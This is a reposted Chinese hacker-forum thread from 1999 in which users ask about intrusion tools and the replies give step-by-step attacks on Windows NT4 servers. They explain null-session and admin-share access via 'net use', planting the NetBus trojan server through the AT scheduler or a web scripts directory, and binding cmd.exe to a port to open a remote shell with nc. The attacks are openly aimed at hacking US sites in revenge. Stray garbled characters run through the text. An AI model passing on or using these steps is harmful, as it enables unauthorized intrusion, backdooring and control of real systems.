《版主頁黑客工具和文章的幾個問題》中提到:
4 E7 \- i( U8 a' U請教�,從版主頁上載得PINGER�,GRINDER,LETMEIN等���,卻不能用�����,PINGER安裝后��,明明安裝前文件有1M多�����,但安裝完后生成的文件夾中只有PINGER�����。EXE��,40多K�,運行PINGER,設置好IP�,點PING,彈出一個窗口(C++����。。�����。)����,說出錯�,然后關閉了��,何故�����,是不是安裝有誤����? 2�。運行LETMEIN,彈出以下錯誤:連接文件LETMEIN����。EXE到不存在的NETAPI32。DLL��;NETGROUPGETUSERS����。 是否說明需要NETAPI32。DLL文件�,哪里有該DLL。 3。USAKILLER 的教學文章中提到需在WINNT4���。0下運行以下步驟等�����,是否要求我的操作系統(tǒng)也是WINNT4��。0 ��,應該不是吧�����? 4���。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務器的操作系統(tǒng)為NT�����? 太多的問題需高手回答�,我花那么多的時間和金錢下載這幾M文件卻不能用,實在窩囊哦�����, 強烈建議USAKILLER 等高手級的黑客寫更多的教學文章,以提高我國黑客水平���。
- J. Z" `. T6 {/ c$ K> 我的機子MMX166�,WIN98���,2。5G�,32M內存。5 B/ i1 I* j/ ~* E* f1 r
1 k" B. o( u( H7 g1 l4 J黑客并不神秘�,你只要了解操作系統(tǒng),學習一些操作系統(tǒng)的弱點�,輔助相關的工具,就可以成功�����。
- V4 f5 O7 Z* l w9 d5 e$ A你的問題是�,pinger, grinder, letmein等工具必須要在NT上運行,我們強烈建議���,你一定要安裝NT��,對于你的機器配制���,和我們現(xiàn)在差不多���,只是比你多了32M內存,2G硬盤��。% n* M9 U/ e, a }9 z
其實��,攻擊敵站�,利用其操作系統(tǒng)本身的工具就可以了,比如�����,我們在NT上攻擊某服務器�,該服務器為NT4.0,我們將做如下簡單事情就有可能成功���,假設目標NT的IP地址為111.111.111.111�,做法如下:: g2 P+ b! t# m! i. y7 m8 d
net use \\111.111.111.111\ipc$ "" /user:""
( B( m) ~+ P% Ynet.exe是NT的工具文件�����,該命令將和目標服務器建立Null Session,如果成功��,你可以查看該服務器上的共享目錄:# V" U: ^( ^6 l7 T
net view \\111.111.111.111; o B8 d& `. E, r0 h% g* L
當然�,如果你有該NT管理員密碼,就更好辦了����,假設其管理員Admin密碼為fuck:
" w/ y- E ^2 {! O. O) }net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"8 f8 ~0 L; x. x* `/ g: v
命令成功后,幾乎所有目標NT上的配制�,資源��,你都可以在你本地NT上連接遠程計算機來查看或修改:
$ Z( V% a" ?' _; m$ ]& r$ y8 p1�����、查看或修改遠程機器上的硬盤�,假如目標NT上有C、D兩個硬盤:$ M& P/ K8 O8 V; @' Q% ^
net use x: \\111.111.111.111\c$
& Q) s; K6 S) |& _3 a9 r2 Xnet use y: \\111.111.111.111\d$
0 w0 m$ [+ V; O, t這樣��,目標NT上的C�����、D盤分別被影射為你本地的X�、Y盤����,你想怎么做都可以...
9 {; l6 ^. N% I: A2�、管理目標NT的用戶:
) g3 h6 S) `& W0 G" W! a, F從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
, c i' \2 m* O7 Z& S; T: H) Q6 m5 S7 b鍵入\\111.111.111.111后,目標NT上的所有用戶你想怎么做都可以���,和管理你本地的一樣
: r/ M$ t' d8 s& b& \8 v1 r3�����、管理目標NT的服務* Q2 s, |' J1 Q
選擇“管理工具(公用)”->“服務器管理”->“計算機”->“選擇域”" p: N; x( {; q+ |2 ?# ]
這樣你可以管理目標NT上的服務��,共享目錄4 N8 I' n$ E1 T) I
4���、IIS管理
. M& w" |- g& N7 F6 R2 n& r選擇“Microsoft Internet Service管理”->“Internet 服務管理器”->"連接到服務器"->111.111.111.111
1 X) H: T# h5 `" j$ S0 r目標NT的FTP、WWW服務你就可以重新配置
/ k6 |3 m( h5 q# ^" @5�、事件管理
* l. R4 V7 c1 q( f1 c4 a“事件查看器”->連接到服務器->111.111.111.111
+ ~3 \9 ~0 x6 j
) D& q @* }9 ?還有更多的東西,都可以用NT本身的功能來完成��,這些都是95, 98所不能實現(xiàn)的�。
: l+ c$ n7 d4 w# B* d0 s) i" M' |/ [$ A$ \) u+ ?$ e# |! }8 m1 v+ Q
當然,98,95也能做一些事情��,但很麻煩�����,比如:
1 [$ g- Y$ U4 t! c- Qnet use \\111.111.111.111\ipc$( o. t' `6 A& s3 h7 O1 D
net use z: \\111.111.111.111\d$( D, R$ Y+ i* X- n9 ?# r
但其后不能帶參數(shù),即改用其他用戶或密碼�,系統(tǒng)將用當前用戶和密碼去登錄,如果你知道目標NT的用戶或密碼��,重新啟動95, 98�,改用該用戶和密碼登錄,方可實現(xiàn)�,你可以連接目標NT上的共享資源,但不能進行管理��,如用戶����、事件等5 s6 |- d) z: }4 \( ~8 F/ ~8 T+ x
# \! _: S- D0 M' Y8 F
我們強烈建議各位有心要為死難者報仇��,真正的想黑霉國的站點��,花點時間��,裝個NT吧����,NT Workstation也可以����!
) E( F/ x! f ~; @! p這樣�,你還可以了解目標機器上能有什么東東供你去用!8 w( L5 J0 S3 `7 R
- Z. c. \4 T) x) p7 U+ f% D
4 k; ~! H3 G+ M7 E% s--------------------------------------------------------------------------------& G' L! ]# R( f$ J! o P
9 r+ k) h0 R/ x1 S3 c" w
>quack于1999-06-12���,23:37:44
$ u- e, h x: `( J在大作《幾個有關黑的問題》中提到:( N4 H+ I9 r" f! D4 H" j
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!�����。) C5 `+ O/ O. @/ ]2 W
* f: L" |/ @ J8 E4 e T# ^killusa于1999-06-13�,03:25:158 l: G7 |# |* h5 [1 W
在大作《Re: 幾個有關黑的問題》中提到:8 a: D0 N. h7 ~5 ^% x1 @
+ a; S+ o% B: P: r# ?0 k- }
letmein.exe 暫時沒有mypwd參數(shù)���,十分抱歉
+ ^& l& X7 o1 Gpinger程序���,只是利用ping來尋找主機,每臺NT服務器有一個主IP地址���,但也可以設置多個輔助IP地址��,比如有些服務器供應商�����,一臺NT服務器上可以設置一千多個IP�,每個IP對應一個Hostname,而真正能找到主機名的只有一個IP地址,就是該主機的主IP地址����,所以有時顯示只有IP,而無主機名��。另外�����,有些服務器是非NT的操作系統(tǒng)�����,有時將不會顯示主機名�����。當然���,有時在服務器上進行一些設置,也會出現(xiàn)上面的情況���。 N. n3 L: Y' [3 `0 [
- Z6 `' M% D+ B9 G- ]Netbus分客戶端程序ntsrv.exe和服務器端netbus.exe兩個程序�����,所以����,netbus.exe是不用上傳的,只需在目的
# C0 X/ Z! D; ]' b$ G" _服務器上運行ntsrv.exe����,而在目的服務器運行該程序有很多種方法:7 [( K8 X) w, Q5 i! j7 |
- {2 p: N/ ]: @4 h+ H3 `! C1、利用服務器的 Schedule 服務來啟動schedule 服務是指在服務器上定時運行某程序����,具體使用方法,可在自己的NT Dos窗口下鍵入以下:* H1 T8 m* i. [
9 C0 K+ M/ k0 O8 Y( f
C:\>net start schedule# x4 U7 ~$ N' F
Schedule 正在啟動服務.....
7 U2 q# D# y7 b! FSchedulw 服務啟動成功����。9 y, t$ w! c. y r& @
C:\>at /?8 t) I, q7 a) w m1 g( ?
AT 命令排定在特定的日期和時間運行某些命令和程序。0 Q- X* p5 M6 T% Z3 B, S5 t2 U
運行 AT 命令之前必須先啟動 Schedule 服務�����。
+ F* R; X, Q: v x- H6 e) A* K9 B
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
+ X W4 h0 l6 w# e1 {3 [AT [\\computername] time [/INTERACTIVE]
2 c7 q& p3 Q" M[ /EVERY:date[,...] | /NEXT:date[,...]] "command": ~1 x- b1 t4 b
8 B8 w# _8 q' X! `
\\computername 指定遠程計算機。 如果省略這個參數(shù)2 [# P) @4 [; i% }2 [" i
命令會被排定在本機上運行�����。$ l$ ?' ]# Z4 j! N% k% z! ]+ [" _
id 指定給排定進度命令的識別號����。
/ z7 I2 R2 z# G4 U0 X
9 W2 f, N: ? y9 t3 r* g$ Q/delete 刪除某個已排定進度的命令。如果省略標識�,計算機上所有已排定進度的命令都會被刪除。
) M7 f4 j2 t E3 H7 m0 C/yes 用于刪除所有作業(yè)���,且不想在運行刪除時顯示確認信息 ���。
( }+ p% ~) k+ @time 指定命令運行的時間。: l" }) A. c0 _: o/ n/ C6 z
/interactive 允許作業(yè)在運行時����,與用戶通過桌面交互。
' K, A3 S6 \* \$ T
* Z2 x% `& g( Y3 n$ g. N( Y/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令��。
7 a* S! @* {" e9 `1 d如果省略日期����,則默認為在每月的本日運行。
: W2 c8 ~( a7 D4 t$ S- L i5 y4 f7 U1 ^% i1 P
/next:date[,...] 指定在下一個指定日期 (如���,下周三)����,運行命令�����。如果省略日期���,則默認為在每月的本日運行����。
, s' D9 [ x( g4 y: Y! \) E, _/ E# p: }" g* H% O# @
"command" 準備運行的 Windows NT 命令或批處理文件�。9 `$ c- }4 W0 z
; k; y8 a5 _. ]/ t9 @7 Y0 W8 }$ }+ ^
C:\>
" n! q4 L% K2 A4 p2 P- q
7 Y; A1 \" [; i/ ^知道了如何使用AT,再來看看如何在遠程NT上運行ntsrv.exe:
4 A I+ k: p q6 `. V1 利用管理員登陸到目的服務器���,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"5 ~3 ~' {" m/ z( R
2 利用ntsrv.exe啟動遠程: netsvc \\x.x.x.x schedule /start: i5 @* [/ ?* P
3 利用AT.EXE在遠程服務器設置程序定時運行�����,當然最快運行最理想���,所以���,你可以用letmein.exe得到服務器的時間,然后:
* n, Y4 }& V' s1 X* K$ {at \\x.x.x.x 00:00 ntsrv.exe /port:64321# x- I$ s2 l0 @0 X7 m% J/ e) }8 A
其中00:00要改為用letmein.exe得回來的具體時間+一點容量��,等一會后���,再在本地啟動netbus.exe����,鍵入目的服務器得ip地址或hostname���,連接���!具體使用可參照 "How to get in nt",比如第一種方法�����,你想要在目的服務器運行 LEGION�����,可以利用netbus得上傳功能,將LEGION上傳至目的服務器����,再用netbus的"Start program"��,鍵入完整路徑的LEGION運行程序��,就ok了�!第二種方法是利用netbus的“App redirect”功能,啟動遠程telnet服務��,如下:在netbus中擊“App redirect”�����,鍵入"C:\>winnt\system32\cmd.exe"���,Port為:4321����,服務就啟動了�����,然后在本地運行:nc x.x.x.x 4321,出現(xiàn)dos啟動的畫面就表示連接成功:
. ?: B3 g! S- d! T, @: `Microsoft(R) Windows NT(TM)
4 `6 L( O: r% ]$ ?0 j A(C) Copyright 1985-1996 Microsoft Corp.
; f' b" T6 n" U" v Z4 rC:\>
6 O* [6 `5 L k2 `0 Y6 [. l$ T& ]7 u$ d& T& t5 z
2�����、利用web啟動ntsrv.exe或其他程序在目的服務器' _2 d4 Y; K$ q/ P
" W; J- w A& d6 w- h/ ^1 K將ntsrv.exe 或其他運行程序Copy到目的服務器的www可執(zhí)行目錄�����,如cgi-bin或scripts�,然后在瀏覽器鍵入url如:8 l0 D: {1 w) j6 `
http://x.x.x.x/scripts/ntsrv.exe /port:64321' _* S$ L# L, B5 H& T
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
% @* Z6 q7 n' o8 y) C& ^/ z8 ?該程序就啟動了 L5 ^; o1 u/ [2 p) w' |; f9 v3 O
0 f+ V$ _0 a- I我只提這幾中方法!
! m, _8 G1 w0 n5 ^3 \7 {$ ?要成功���,必須打好基礎工���,對操作系統(tǒng)充分了解!
: U( K; s$ j: V0 [+ c% W0 g( T$ i" D9 i& X" t6 ]3 ~; }
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡